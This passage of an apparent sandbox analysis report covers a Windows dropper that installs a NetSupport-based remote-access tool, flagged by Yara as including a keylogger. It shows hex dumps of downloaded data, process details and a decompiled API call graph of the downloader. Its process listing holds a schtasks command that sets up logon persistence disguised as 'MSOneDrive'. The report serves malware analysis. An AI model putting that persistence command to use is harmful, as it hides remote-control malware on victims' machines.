3f ba ea f8 e8 11 bb 17 f5 79 f7 7b ae cb 95 d2 84 5d 9b 7b a7 8c 93 86 f8 c4 ea a9 b5 0f e4 92 69 b4 f7 db 96 dd 9d 34 d9 eb e7 15 07 a6 be
                                                      Data Ascii: iCsCZ;=#nhTbSpQo\O#Oz+r[SV.=bTQP:~oGP0qoM`km~8`U4ugjx;kf[c'beC-WqCFx?y{]{i4
                                                      2024-09-21 12:45:38 UTC8000INData Raw: 37 fd 93 a1 db 23 d9 74 b0 47 b6 4e 4a d9 24 22 a5 13 6f f1 a7 01 8d 64 9e 36 d5 4f f9 df 92 ce 86 ea a7 a4 4f 51 97 f4 f1 f8 eb 0d 91 ec 13 e4 f2 48 68 19 5b 77 68 19 49 6d 64 0b 09 2d 23 4b 4c bb ae 67 f4 ff 12 57 24 84 bf 97 7a ed 22 75 22 1b 4d bd da 8c fe 73 74 93 64 8b 15 de c7 e5 32 19 5c 73 68 eb e4 78 e6 9c 85 4e ce 59 a8 89 a9 ef 4a da e9 9f 8f 4b fd 3b e4 1d 5f 6b c7 cc a0 b3 63 1a d1 85 98 1b c6 be 83 e4 1d 3b 68 27 85 f0 78 8b bd 8f 86 31 1b e9 c6 da 31 3d ef 90 2d 0c f6 5e 87 1d 01 35 d9 17 2c 6d 45 02 f8 ef b4 53 3b 76 8a a4 51 f8 1b 18 b0 d2 5a 22 49 6f 37 b1 30 64 4e 7a 27 92 42 bb 26 0d b7 dd bf f3 cd 68 c4 cd 06 66 ca 98 88 fe df 75 4d 1f 7d 2a 06 ad be ee 51 93 59 13 48 c7 e8 6f 18 fb 43 12 d9 b6 6b 48 08 ef 1a ea 5a 6d c7 64 a2 1b bb
                                                      Data Ascii: 7#tGNJ$"od6OOQHh[whImd-#KLgW$z"u"Mstd2\shxNYJK;_kc;h'x11=-^5,mES;vQZ"Io70dNz'B&hfuM}*QYHoCkHZmd
                                                      2024-09-21 12:45:38 UTC8000INData Raw: fd 97 ea 91 f8 07 04 04 22 7f ff 80 36 8b f1 7f 7e f9 13 0e 93 26 05 a3 d0 d0 50 34 7d fa 8c 56 69 c6 8c 50 34 65 ca 14 34 71 a2 1f e3 ff 1c f2 27 dc a4 52 19 3a 7b f6 2c aa ac bc 86 ca cb cb 5b a5 ca ca 4a 54 52 52 82 96 2d 5b 8e 7c 7d 27 32 fe cf 19 ff f1 e3 27 a0 cf 3e fb 1c 3d aa e5 e7 e7 a3 09 13 bc 19 ff 76 c4 9f 8c e9 a4 8f 09 17 43 f2 f4 f4 42 53 a7 4e 45 3b 76 fc 8a 0e 1f 3e 8c 0e 1d 3a 44 55 54 54 84 4e 9d 3a 65 50 45 45 27 69 b9 c2 c2 42 94 97 97 87 64 b2 58 e4 e1 31 8e fa 34 26 ed b9 86 f1 7f f2 fc fd fd fd 29 97 f4 f4 f7 d0 f2 e5 2a bd 52 a9 54 68 e9 d2 a5 28 25 65 31 4a 4b 5b a6 51 1a 3d 26 bc bd 7d e8 f9 a1 a9 7c 7c 7c a9 7f 52 87 d4 5d bc 38 95 fa 49 4f 4f a7 db 5a bd fa 7d 1c 5f d1 6c 5b 24 4f 2e 97 d7 cf 17 19 ff 27 cb df cb 6b 3c fa fa
                                                      Data Ascii: "6~&P4}ViP4e4q'R:{,[JTRR-[|}'2'>=vCBSNE;v>:DUTTN:ePEE'iBdX14&)*RTh(%e1JK[Q=&}|||R]8IOOZ}_l[$O.'k<
                                                      2024-09-21 12:45:38 UTC8000INData Raw: e7 f8 df 61 33 6f 9b 02 8f 44 85 76 65 1b a2 a9 2b 34 7b 4d 90 42 f4 87 67 0e e7 7b 7c 5d 54 36 84 9d af f7 93 5d 33 79 4c 50 2a 3e b4 ae db b0 5c 4f c9 fd f1 e1 89 a1 40 75 57 54 63 de 6d fe a8 ec 93 8f d7 09 ba 96 08 ee 63 9d 7f 2d 76 7f 1f cd 53 f7 fe b1 1e bb 97 1e b2 96 d6 66 77 9c 9e 9f 6a f8 07 be 9c d0 a2 f4 a0 a5 35 b9 68 b0 b1 c5 37 8c 29 3e 62 6e d8 2a 77 23 6f c9 b2 dd e3 9b af 62 75 cc 23 7b 2f 14 d8 14 af 26 e6 06 ca 45 8d 48 6e e9 c9 7c 41 cc 48 b8 15 2a 5b 21 92 20 93 7f b6 c9 cb 81 f0 a8 5a bf f3 88 d0 4a ab 1b 79 fb 77 3e 24 94 15 f8 6f c7 f9 fc f1 2a 7b 03 11 83 bc 05 e2 97 89 b8 6c d8 76 b1 76 73 28 13 3b 42 be 33 f0 b1 63 57 15 ae 37 4b 8b 1a 46 5b 17 94 7a f0 ad 40 4e 40 83 b7 07 cf aa 96 3f a6 4a b7 f4 eb 75 a1 9f 1b 9f 48 ed 58 79
                                                      Data Ascii: a3oDve+4{MBg{|]T6]3yLP*>\O@uWTcmc-vSfwj5h7)>bn*w#obu#{/&EHn|AH*[! ZJyw>$o*{lvvs(;B3cW7KF[z@N@?JuHXy
                                                      2024-09-21 12:45:38 UTC8000INData Raw: c5 b0 d9 85 42 f2 82 85 03 5b e2 5f c1 c0 ee bc 75 08 67 18 23 d5 a2 b6 e5 48 2c e8 16 8c a4 a2 b0 14 0d 2d 85 ff 4b de b0 c0 d7 0b 6b a3 ad 0b 91 d7 83 0b d1 fb a5 95 ee 5f 10 4a 88 45 28 24 da 86 f7 42 4a c1 b6 5c d7 ba 14 bc 2a 5c 88 b6 2e 09 ef a1 2c e1 bf e7 26 31 28 5c 48 af 4f 44 37 b3 75 47 37 13 d7 2e b6 90 e8 66 d2 a4 ae 6b b1 28 f2 33 5c 91 3e f6 c4 aa 5b d7 a9 91 d8 55 77 4c 55 14 99 c6 b6 b8 58 fd db b8 5c c6 83 6b 8e ee 5f 98 5b bf 62 a1 0b 2b 16 5a c7 c4 0f e4 3d 12 5c 83 4b fd 27 a4 9d 33 ba 31 3b a9 dd 98 ca d4 51 66 86 f8 e7 11 dd 89 de 08 92 5f 0f ba 27 68 18 33 a2 3a de 8b 51 d0 29 6a 18 3e b6 08 9d e4 f8 27 56 85 cd 5e 8a 95 e0 a7 dd 04 e3 a7 89 1b 99 3f 89 81 20 18 09 25 5c 6b cb 08 87 84 82 bc 26 cc 74 1f 7e 24 15 51 a2 b7 8f a9 64
                                                      Data Ascii: B[_ug#H,-Kk_JE($BJ\*\.,&1(\HOD7uG7.fk(3\>[UwLUX\k_[b+Z=\K'31;Qf_'h3:Q)j>'V^? %\k&t~$Qd
                                                      2024-09-21 12:45:38 UTC8000INData Raw: 77 56 e9 eb 62 a8 1d 73 c6 77 50 04 b9 cf a9 51 fe 3e 37 ff 57 b8 fe 3f b7 42 75 ab 37 d6 fb 5b 77 f3 8f c7 6d e7 ff 88 9e f7 38 1e 5d 7b 46 8f c7 a4 44 65 3c f6 6a 63 72 18 9c c3 b8 9c 63 f2 e0 d4 c6 cf 4e 8c 50 fa 93 f3 94 68 f2 48 5d db 2e 5f 76 ca a3 a4 76 e6 5b fb d4 61 2a ab 0e 51 39 74 4a 2c fa f0 3c 3a eb 12 e4 a0 31 5c bb cb 2b 42 03 b9 6d 6a f9 c1 07 e0 cb fa 5f 93 47 3b ef ec 1b 5c de e1 35 72 35 30 e3 57 ca 01 ca 2a 54 ca 5d 2d ae 84 8b fa ae 5b 49 f0 5d 85 bc d7 2e f9 53 1e f9 2b 14 92 27 45 8a 56 ca 80 d3 a5 9d f1 0f a6 54 34 e6 83 2c 58 06 ac 7e 54 9e 12 03 4e 5a e4 59 31 d8 1f 47 88 5c 6c c0 da d2 c6 b0 dd 54 fe 8b 27 dd bd cd 7a e9 97 cf bd ed f8 2c 29 96 34 a3 e7 89 36 df 11 a9 d2 96 c5 68 e1 a6 bc 2b d0 a4 e3 26 f6 fe fb 60 5e be 09 23
                                                      Data Ascii: wVbswPQ>7W?Bu7[wm8]{FDe<jcrcNPhH]._vv[a*Q9tJ,<:1\+Bmj_G;\5r50W*T]-[I].S+'EVT4,X~TNZY1G\lT'z,)46h+&`^#
                                                      2024-09-21 12:45:38 UTC8000INData Raw: c0 6e 70 18 9c 06 97 01 3b 0c 1d 0f 4a 82 f2 a0 0a a8 0d 92 40 0b d0 16 74 05 d9 20 17 bc 0d 46 82 89 e0 2b f0 2d 58 03 b6 82 9d e0 00 38 06 ce 80 bf c0 4d 60 39 02 3d 00 4a 83 a7 41 4d d0 08 34 03 ad 40 47 90 01 ba 83 5c f0 26 78 07 8c 00 1f 83 09 60 1a 58 08 96 83 6d e0 10 38 0e ae 02 f6 2b ec 1e 50 02 94 07 95 41 4d d0 00 a4 82 f6 c0 0e bc e0 4d 30 18 8c 06 93 c1 7c b0 1c 6c 05 79 e0 18 b8 08 d8 6f e8 17 50 0a 54 06 f5 40 0a 68 0d ba 02 17 08 82 fe e0 3d 30 01 7c 05 16 81 75 e0 67 70 18 9c 01 d7 41 ec 51 e8 14 f0 24 a8 01 1a 81 96 e0 55 e0 02 21 30 00 7c 00 c6 83 af c0 62 b0 0e ec 00 47 c0 39 70 1d 58 8e 21 2f 50 11 54 03 cf 83 64 d0 0a 74 04 56 90 05 bc 20 0c de 06 43 c1 28 30 09 cc 02 0b c1 4a b0 19 ec 06 87 c0 71 70 01 fc 0b 2c bf a3 3f 41 59 50 19
                                                      Data Ascii: np;J@t F+-X8M`9=JAM4@G\&x`Xm8+PAMM0|lyoPT@h=0|ugpAQ$U!0|bG9pX!/PTdtV C(0Jqp,?AYP
                                                      2024-09-21 12:45:38 UTC8000INData Raw: 04 7d 3a 3b 23 b3 d9 69 9e cc 4e f3 fc 75 62 45 6a dd e3 0b 45 75 9c f2 a8 86 c8 33 28 12 60 7a 52 46 c4 6c 7d cb 0f 36 cd d1 03 9d 6e 59 30 56 87 d3 b4 22 9c 01 87 a3 bb 96 97 f6 a4 f6 8f 26 99 82 b4 61 0f 04 6d 6a 87 aa 82 16 1b b2 49 50 fb 31 e8 70 bb 23 e9 e5 27 35 b2 26 99 82 b4 85 e8 8c a8 0e 63 41 3a 23 aa c3 89 ed 04 bf 58 62 3e 9b 32 75 42 46 c2 90 11 dd a4 4d 9c 26 6d e2 8c d2 26 ce 28 0d e2 54 6e 9e 22 d5 89 e8 11 a7 59 79 64 29 cb 20 4b 5b 06 05 1d 72 64 bf 88 8a 51 9e 8c 73 93 f2 a4 6b 14 f9 c1 e4 af cd 2b 59 cc 76 60 83 53 57 ba ea 71 cb 2b 0d 5d 0f a8 c1 38 38 98 63 7b 43 41 5f 48 b9 cb ca b1 69 55 d0 ed 4b 45 56 5b 6d 97 5f 3f 69 71 b5 80 90 6a 1f 44 67 6e 5c 45 6a 8f 86 2d a7 3c 69 46 5c 56 d4 1d a8 fa 1c 36 15 1a 99 d0 8a 86 d0 9c 68 4f
                                                      Data Ascii: }:;#iNubEjEu3(`zRFl}6nY0V"&amjIP1p#'5&cA:#Xb>2uBFM&m&(Tn"Yyd) K[rdQsk+Yv`SWq+]88c{CA_HiUKEV[m_?iqjDgn\Ej-<iF\V6hO


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:3
                                                      Start time:08:45:28
                                                      Start date:21/09/2024
                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe"
                                                      Imagebase:0xc80000
                                                      File size:140'800 bytes
                                                      MD5 hash:AACE5ED77F7D47CAD3E45E0CCDC5411C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:10
                                                      Start time:08:45:38
                                                      Start date:21/09/2024
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "MSOneDrive" /tr "C:\Users\user\AppData\Local/MSOneDrive\client32.exe" /RL HIGHEST
                                                      Imagebase:0xb20000
                                                      File size:187'904 bytes
                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:11
                                                      Start time:08:45:38
                                                      Start date:21/09/2024
                                                      Path:C:\Users\user\AppData\Local\MSOneDrive\client32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Local/MSOneDrive\client32.exe
                                                      Imagebase:0x9d0000
                                                      File size:107'376 bytes
                                                      MD5 hash:F6ABEF857450C97EA74CD8F0EB9A8C0A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000000.1369497547.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.3742058275.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 12%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:false

                                                      General

                                                      Target ID:12
                                                      Start time:08:45:38
                                                      Start date:21/09/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:13
                                                      Start time:08:45:40
                                                      Start date:21/09/2024
                                                      Path:C:\Users\user\AppData\Local\MSOneDrive\client32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Local/MSOneDrive\client32.exe
                                                      Imagebase:0x9d0000
                                                      File size:107'376 bytes
                                                      MD5 hash:F6ABEF857450C97EA74CD8F0EB9A8C0A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000000.1388077049.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.1391294248.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.1390661255.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:5%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:14.8%
                                                        Total number of Nodes:1295
                                                        Total number of Limit Nodes:23
                                                        execution_graph 12164 c8fbfa 12165 c8fc0c 12164->12165 12169 c8fc08 12164->12169 12166 c8fc11 12165->12166 12167 c8fc37 12165->12167 12168 c8d8f2 _unexpected 14 API calls 12166->12168 12167->12169 12175 c91595 12167->12175 12170 c8fc1a 12168->12170 12172 c8dc45 __freea 14 API calls 12170->12172 12172->12169 12173 c8fc57 12174 c8dc45 __freea 14 API calls 12173->12174 12174->12169 12176 c915a2 12175->12176 12179 c915bd 12175->12179 12177 c915ae 12176->12177 12176->12179 12180 c8dc32 __floor_pentium4 14 API calls 12177->12180 12178 c915cc 12191 c94915 12178->12191 12179->12178 12184 c948e2 12179->12184 12183 c915b3 __CreateFrameInfo 12180->12183 12183->12173 12185 c948ed 12184->12185 12186 c94902 HeapSize 12184->12186 12187 c8dc32 __floor_pentium4 14 API calls 12185->12187 12186->12178 12188 c948f2 12187->12188 12189 c8db74 ___std_exception_copy 41 API calls 12188->12189 12190 c948fd 12189->12190 12190->12178 12192 c9492d 12191->12192 12193 c94922 12191->12193 12194 c94935 12192->12194 12202 c9493e _unexpected 12192->12202 12203 c8dc7f 12193->12203 12196 c8dc45 __freea 14 API calls 12194->12196 12199 c9492a 12196->12199 12197 c94968 HeapReAlloc 12197->12199 12197->12202 12198 c94943 12200 c8dc32 __floor_pentium4 14 API calls 12198->12200 12199->12183 12200->12199 12201 c8c57b _unexpected 2 API calls 12201->12202 12202->12197 12202->12198 12202->12201 12204 c8dcbd 12203->12204 12209 c8dc8d _unexpected 12203->12209 12206 c8dc32 __floor_pentium4 14 API calls 12204->12206 12205 c8dca8 RtlAllocateHeap 12207 c8dcbb 12205->12207 12205->12209 12206->12207 12207->12199 12208 c8c57b _unexpected 2 API calls 12208->12209 12209->12204 12209->12205 12209->12208 10524 c8727e 10525 c8728a ___scrt_is_nonwritable_in_current_image 10524->10525 10550 c87596 10525->10550 10527 c87291 10528 c873e4 10527->10528 10539 c872bb ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 10527->10539 10598 c87884 IsProcessorFeaturePresent 10528->10598 10530 c873eb 10602 c8d0f2 10530->10602 10535 c872da 10536 c8735b 10558 c87999 10536->10558 10538 c87361 10562 c82710 10538->10562 10539->10535 10539->10536 10580 c8d0cc 10539->10580 10545 c87381 10546 c8738a 10545->10546 10589 c8d0a7 10545->10589 10592 c87707 10546->10592 10551 c8759f 10550->10551 10608 c87b48 IsProcessorFeaturePresent 10551->10608 10555 c875b0 10556 c875b4 10555->10556 10618 c887ab 10555->10618 10556->10527 10678 c88800 10558->10678 10561 c879bf 10561->10538 10680 c81000 10562->10680 10564 c82725 10565 c82729 CreateMutexW GetLastError 10564->10565 10566 c82785 10564->10566 10567 c8277d ExitProcess 10565->10567 10568 c82744 10565->10568 10587 c879cf GetModuleHandleW 10566->10587 10569 c8274b 10568->10569 10570 c82754 10568->10570 10725 c824b0 GetCurrentProcess OpenProcessToken 10569->10725 10698 c81420 GetProcessHeap HeapAlloc 10570->10698 10575 c8278b 10750 c82520 6 API calls 10575->10750 10576 c82774 10730 c81860 10576->10730 10581 c8d761 ___scrt_is_nonwritable_in_current_image 10580->10581 10582 c8d0e2 _unexpected 10580->10582 11705 c8f07b GetLastError 10581->11705 10582->10536 10588 c8737d 10587->10588 10588->10530 10588->10545 11799 c8cf26 10589->11799 10593 c87713 10592->10593 10594 c87392 10593->10594 11870 c8d6d2 10593->11870 10594->10535 10596 c87721 10597 c887ab ___scrt_uninitialize_crt 7 API calls 10596->10597 10597->10594 10599 c8789a __CreateFrameInfo 10598->10599 10600 c87945 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10599->10600 10601 c87989 __CreateFrameInfo 10600->10601 10601->10530 10603 c8cf26 __CreateFrameInfo 21 API calls 10602->10603 10604 c873f1 10603->10604 10605 c8d0b6 10604->10605 10606 c8cf26 __CreateFrameInfo 21 API calls 10605->10606 10607 c873f9 10606->10607 10609 c875ab 10608->10609 10610 c8878c 10609->10610 10624 c89997 10610->10624 10614 c887a8 10614->10555 10615 c8879d 10615->10614 10638 c899d3 10615->10638 10617 c88795 10617->10555 10619 c887be 10618->10619 10620 c887b4 10618->10620 10619->10556 10621 c88a49 ___vcrt_uninitialize_ptd 6 API calls 10620->10621 10622 c887b9 10621->10622 10623 c899d3 ___vcrt_uninitialize_locks DeleteCriticalSection 10622->10623 10623->10619 10625 c899a0 10624->10625 10627 c899c9 10625->10627 10628 c88791 10625->10628 10642 c89bdc 10625->10642 10629 c899d3 ___vcrt_uninitialize_locks DeleteCriticalSection 10627->10629 10628->10617 10630 c88a16 10628->10630 10629->10628 10659 c89aed 10630->10659 10635 c88a46 10635->10615 10637 c88a2b 10637->10615 10639 c899fd 10638->10639 10640 c899de 10638->10640 10639->10617 10641 c899e8 DeleteCriticalSection 10640->10641 10641->10639 10641->10641 10647 c89a02 10642->10647 10645 c89c14 InitializeCriticalSectionAndSpinCount 10646 c89bff 10645->10646 10646->10625 10648 c89a1f 10647->10648 10651 c89a23 10647->10651 10648->10645 10648->10646 10650 c89a8b GetProcAddress 10650->10648 10651->10648 10651->10650 10652 c89a7c 10651->10652 10654 c89aa2 LoadLibraryExW 10651->10654 10652->10650 10653 c89a84 FreeLibrary 10652->10653 10653->10650 10655 c89ab9 GetLastError 10654->10655 10656 c89ae9 10654->10656 10655->10656 10657 c89ac4 ___vcrt_FlsFree 10655->10657 10656->10651 10657->10656 10658 c89ada LoadLibraryExW 10657->10658 10658->10651 10660 c89a02 ___vcrt_FlsFree 5 API calls 10659->10660 10661 c89b07 10660->10661 10662 c89b20 TlsAlloc 10661->10662 10663 c88a20 10661->10663 10663->10637 10664 c89b9e 10663->10664 10665 c89a02 ___vcrt_FlsFree 5 API calls 10664->10665 10666 c89bb8 10665->10666 10667 c89bd3 TlsSetValue 10666->10667 10668 c88a39 10666->10668 10667->10668 10668->10635 10669 c88a49 10668->10669 10670 c88a59 10669->10670 10671 c88a53 10669->10671 10670->10637 10673 c89b28 10671->10673 10674 c89a02 ___vcrt_FlsFree 5 API calls 10673->10674 10675 c89b42 10674->10675 10676 c89b5a TlsFree 10675->10676 10677 c89b4e 10675->10677 10676->10677 10677->10670 10679 c879ac GetStartupInfoW 10678->10679 10679->10561 10681 c8140f 10680->10681 10684 c81022 10680->10684 10681->10564 10682 c81053 lstrcmpA 10683 c810b0 GetProcessHeap HeapAlloc 10682->10683 10682->10684 10686 c81100 __InternalCxxFrameHandler 10683->10686 10684->10681 10684->10682 10685 c810e4 lstrlenA 10685->10686 10686->10684 10686->10685 10687 c81216 GetProcessHeap HeapAlloc 10686->10687 10688 c812c8 GetProcessHeap HeapAlloc 10687->10688 10689 c8125d __InternalCxxFrameHandler 10687->10689 10753 c89c70 10688->10753 10689->10688 10691 c81260 GetProcessHeap HeapAlloc 10689->10691 10691->10689 10692 c81305 GetProcessHeap HeapAlloc 10693 c89c70 __InternalCxxFrameHandler 10692->10693 10694 c81351 GetProcessHeap HeapAlloc 10693->10694 10695 c8139d __InternalCxxFrameHandler 10694->10695 10696 c813c9 GetProcessHeap HeapAlloc 10695->10696 10697 c81400 __InternalCxxFrameHandler 10695->10697 10696->10697 10697->10564 10699 c81847 10698->10699 10723 c81479 10698->10723 10895 c86f60 10699->10895 10700 c8164e lstrcatW PathFileExistsW 10704 c8183b GetProcessHeap HeapFree 10700->10704 10705 c81775 GetCurrentProcess OpenProcessToken 10700->10705 10702 c81854 10702->10567 10702->10576 10704->10699 10707 c817c8 10705->10707 10708 c81797 GetTokenInformation CloseHandle 10705->10708 10837 c81a80 10707->10837 10708->10707 10710 c814a8 Sleep 10713 c814bf 10710->10713 10710->10723 10712 c817d7 __CreateFrameInfo 10716 c817e7 CreateProcessW 10712->10716 10713->10723 10714 c814d5 ExpandEnvironmentStringsW SHCreateDirectoryExW 10715 c81503 SetFileAttributesW 10714->10715 10714->10723 10715->10723 10716->10704 10717 c81825 CloseHandle CloseHandle 10716->10717 10717->10704 10719 c815ad GetProcessHeap HeapAlloc 10721 c815c8 PathCombineW 10719->10721 10719->10723 10720 c86120 27 API calls 10720->10719 10721->10723 10722 c81600 GetProcessHeap HeapFree 10722->10723 10723->10700 10723->10710 10723->10715 10723->10719 10723->10720 10723->10722 10755 c825b0 InternetOpenW 10723->10755 10768 c86dd0 10723->10768 10781 c869e0 10723->10781 10851 c86120 10723->10851 10726 c82508 10725->10726 10727 c824dd GetTokenInformation CloseHandle 10725->10727 10728 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10726->10728 10727->10726 10729 c82515 10728->10729 10729->10570 10729->10575 10731 c825b0 18 API calls 10730->10731 10732 c81888 10731->10732 10733 c81a63 10732->10733 10734 c81893 GetProcessHeap HeapAlloc SHGetSpecialFolderPathW 10732->10734 10735 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10733->10735 10734->10733 10736 c818c4 10734->10736 10737 c81a70 10735->10737 10738 c86dd0 29 API calls 10736->10738 10737->10567 10739 c818d8 10738->10739 10740 c86120 27 API calls 10739->10740 10741 c818fb 10739->10741 10740->10741 10741->10733 10742 c8197d GetProcessHeap HeapAlloc 10741->10742 10743 c86120 27 API calls 10741->10743 10742->10741 10744 c8199c PathCombineW 10742->10744 10743->10742 10745 c819b4 __CreateFrameInfo 10744->10745 10746 c869e0 71 API calls 10745->10746 10747 c819e6 CreateProcessW 10745->10747 10746->10745 10748 c81a3c GetProcessHeap HeapFree 10747->10748 10749 c81a24 CloseHandle CloseHandle 10747->10749 10748->10741 10749->10748 10751 c82576 ShellExecuteW 10750->10751 10751->10751 10752 c8258e GetProcessHeap HeapFree GetProcessHeap HeapFree ExitProcess 10751->10752 10754 c89c88 10753->10754 10754->10692 10754->10754 10756 c826f9 10755->10756 10757 c825f5 InternetOpenUrlW 10755->10757 10758 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10756->10758 10759 c826ed InternetCloseHandle 10757->10759 10764 c8260f __InternalCxxFrameHandler 10757->10764 10760 c82707 10758->10760 10759->10756 10760->10723 10761 c82630 InternetReadFile 10762 c82658 GetProcessHeap HeapAlloc 10761->10762 10763 c82665 GetProcessHeap RtlReAllocateHeap 10761->10763 10762->10764 10763->10764 10764->10761 10765 c826a7 GetProcessHeap RtlAllocateHeap 10764->10765 10766 c89c70 __InternalCxxFrameHandler 10765->10766 10767 c826cc GetProcessHeap RtlFreeHeap InternetCloseHandle 10766->10767 10767->10759 10902 c87172 10768->10902 10770 c86e07 __CreateFrameInfo 10771 c86e1c GetCurrentDirectoryW 10770->10771 10772 c86e66 10771->10772 10772->10772 10773 c86e89 10772->10773 10774 c87172 16 API calls 10773->10774 10775 c86e9b 10774->10775 10912 c85360 10775->10912 10777 c86ec5 10778 c87172 16 API calls 10777->10778 10780 c86ecb 10777->10780 10779 c86f42 10778->10779 10779->10714 10780->10714 10782 c86a44 10781->10782 10789 c86a01 10781->10789 10783 c86a7d 10782->10783 10784 c86a65 10782->10784 10788 c86a86 10783->10788 10795 c86ab8 10783->10795 10785 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10784->10785 10787 c86a77 10785->10787 10786 c86b13 10792 c86120 27 API calls 10786->10792 10787->10722 10793 c85540 8 API calls 10788->10793 10789->10782 10790 c86a20 10789->10790 10794 c8c52b ___std_exception_copy 14 API calls 10789->10794 10791 c86a37 10790->10791 11286 c847e0 10790->11286 10797 c8c52b ___std_exception_copy 14 API calls 10791->10797 10798 c86b22 10792->10798 10799 c86aa8 10793->10799 10794->10790 10795->10786 10795->10799 10797->10782 10802 c86b32 10798->10802 10804 c86b6e 10798->10804 10799->10795 10800 c85540 8 API calls 10799->10800 10800->10799 10801 c86830 66 API calls 10803 c86b59 10801->10803 10802->10801 10808 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10803->10808 10805 c86bb7 10804->10805 10806 c86dc4 10804->10806 10807 c86bd4 10804->10807 11290 c827b0 10805->11290 11294 c87097 10806->11294 10807->10805 10809 c86c25 10807->10809 10810 c86b68 10808->10810 10815 c827b0 45 API calls 10809->10815 10810->10722 10813 c86c20 11166 c86830 10813->11166 10815->10813 10817 c86c50 CreateFileW 10818 c86c7b 10817->10818 10819 c86c93 10817->10819 10821 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10818->10821 11237 c85b70 10819->11237 10822 c86c8d 10821->10822 10822->10722 10824 c86ca0 10825 c86ce9 WriteFile 10824->10825 10828 c86d15 10824->10828 11255 c85d40 10824->11255 10825->10824 10825->10828 10826 c86da1 CloseHandle 10829 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10826->10829 10827 c86d73 SetFileTime CloseHandle 10827->10826 10830 c86d41 10828->10830 10832 c8c52b ___std_exception_copy 14 API calls 10828->10832 10836 c86d65 10828->10836 10831 c86dbe 10829->10831 10833 c86d58 10830->10833 10834 c847e0 14 API calls 10830->10834 10831->10722 10832->10830 10835 c8c52b ___std_exception_copy 14 API calls 10833->10835 10834->10833 10835->10836 10836->10826 10836->10827 10838 c81e66 